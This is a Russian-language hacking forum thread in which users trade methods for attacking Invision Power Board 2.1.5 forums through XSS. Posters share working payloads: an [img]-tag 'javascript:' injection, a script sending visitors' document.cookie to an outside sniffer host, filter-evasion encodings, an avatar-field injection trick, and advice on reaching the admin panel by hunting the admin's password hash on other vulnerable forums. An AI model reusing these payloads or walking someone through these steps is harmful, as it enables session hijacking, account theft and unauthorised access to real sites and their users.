Invision 2.1.5 Xss
 

Вобшем как можно унать хэш на это версии движка,
помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.

а попробовать? не работает.

Xss баг через репорт в 2.1.5 исправлен, он для 2.1.4

Спасибо буду знать, а не подскажете как нибудь там можно сваравать хэш, может сплойт есть. Знаю что гугл рулит, но всё так преятней узнать от знающих людей. ПРобывал сам поискать чтоб хэш cтырить, но что то не выходит.

sexxx, никак, пока XSSбаги там не нашли.

Пока ничего такого нет. Версия ещё девственная. В смысле не поимел пока никто.
Можно через аватарку попробовать вроде бы. Но это только под Ie.

вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]

Invision Power Board 2.1.5 до 2006-03-08 и версии до 2.1.x

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в модуле PM. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

P.S.: В инете искать пробовали?

Работает спасибо :)))
а теперь после того как получил алерт что мне делать?
заранее спасибо

тебе ввобщем надо получить куки припомощи JavaScript.
вот пример:

<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)

Вроде похоже на
http://forum.antichat.ru/thread15709.html

Не понял вместо
[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]

XSS вставить твой код? Тогда алерт заробает когда посетитель зайдет на ту страницу
???

Попробал вот это
[img]j a v a s c r i p t:document.images[1].src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;.jpg[/img]

и вот что мне выдал
Sorry, dynamic pages in the [IMG] tags are not allowed

вместо знака вопроса пробавл вот это %3F затем &#x3F; и это &#63

Там надо пропустить тебе через http://ha.ckers.org/xss.html вот эти символы:
" пробел ; ' + ?
возможно еще [ ]

Хм... Ты не правильно меня понял... Я не имел ввиду вставить в алерт вместо слова XSS я имел вставить вместо алерта. Т.е. после слова javascript =)

Хмм.. Ну никак не удаётся протащить ? и ;

там хэши наскоко помню соленые так что толку от xss ...

Почитать внутренние форумы и личные мессаги. Ещё поиграться.

Ввобщем этой XSS был подвержен damagelab.org вот видео http://dreamshell.h16.ru/hack/damagelab.rar

Как я вижу ни кто куки и не стырил припомощи этой XSS. Эх... Вот готовый код для тырки кук:
пояснение:
1)вместо пробелов в слове javascript ставим табуляцию. 2)После img.src= убираем пробел.
3)Этот код пашет токо под ИЕ.
4)Убираем звездочки только с тегов [img] и [/img]

ПС просьба репу добавлять CinerX, а не _CinerX

Для Ipb 2.1.5:
Заходим в профиль => смена аватары. Сохраняем страницу на винт редактируем, чтоб не было ограничений на ввод урла аватары. Ввобим код выши в поле грузить с урл и жмем сохранить аватару. Вот и все =)

ПС репу поднимаем CinerX, а не _CinerX

Sorry, that is not a valid file extension

У меня не получаеться ничего (((

и так тоже не получаеться
[img]j a v a s c r i p t:document.images%5B1%5D.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27+document.cookie%3B.jpg[/img]

На портале не одна статья по xss.
Ищи.
------------
ой блин - а напостили то сколько
в таком случае мой ответ - движок что-то из твоего запроса фильтрует

Про xss на античате уже давно читал. Тут только как делать алерт обьясняют, а про сниффера нету. А алерт у меня есть.

Есть про сниффер. Пойду сейчас на локалке проверю предъявленные способы.

Всё работает на 2.1.5, если через аватару. Правда, там где я проверял была ещё одна защита от дурака (но неизобретательного дурака).

Изобретательных дураков не бывает. Изобретательный-не дурак. :)

Кстати вроде бы джордоновская Xss для 2.1.4 работает в этой версии.

Поцан просто не знал как с Xss быть воти отмазался.

Хм... Вот для тех кто пишет, что ни фига на работает:
http://dreamshell.h16.ru/hack/cookie_avatar_ipb.txt

А дай пожалуйста ссылку, попробую. А то через аватару всё же сильно палевно :(

Я дал уже!!!
Причём в ЭТОЙ теме!!!!!

Я и у меня тоже наконецто получилось ответ ищите в этой теме
Теперь такой вопрос встал как сделать чтобы а аватаре было картинка еще, чтобы никто не заподозрил?

Я уже задавал этот вопрос, ответ - никак, ссылка: http://forum.antichat.ru/thread17664.html

У меня есть сниффер установленный на локалхосте. Я его залил на хост где поддерживвает пхп. Так вот когда на ссылку нажимаешь то открываеться картинка. Но это все работает у меня только на локалхосте. А так когда я нажимаю на ссылку она закачывается. Незнаю может я через лису просматривал из за этого так. Хочу сказать что можно.

Ни чего не понял! Как же тогда она открывается как аватара, если она закачивается???

Все работает на ура :)!!!
Есть вопрос хеш получен но проблема его расшифровать , наверное он с солью. Как можно соль узнать??
И еще как можно попасть в админку?

Через Xss никак. Там соль.

Можно попробовать сделать следущее (Меня такой способ много раз выручал)
Если известна Аська админа Например 123456789
Идем в гугле или яндекс и пишем ICQ 123456789
Если ничего не получиться типа не найдет то
Можно Если зная мыло задать такойже запрос (Тока с мылом например admin@admin.ru)
Если уж ничего не получается то по нику хотяб. (Пишешь Профиль пользователя Его-Ник)
Если тебе в одном из перечисленных случаев повезет (вылезет профиль пользователя его ник итд итп) то попробуй отыскать бажный форум ipb 1.3 версии и попробуй из него вытащить hash который можно легко расшифровать... Возможно он подойдет от админки твоего форума.
Еще раз повторяю этот способ мне помогал очень много раз.

как понять поставить вместо пробелов табуляцию???

Скопировать с этого форума сплойт в блокнот. И везде где пробелы удалить их, а вместо них поставить табуляции!!!!

сорри ступил алерт прошёл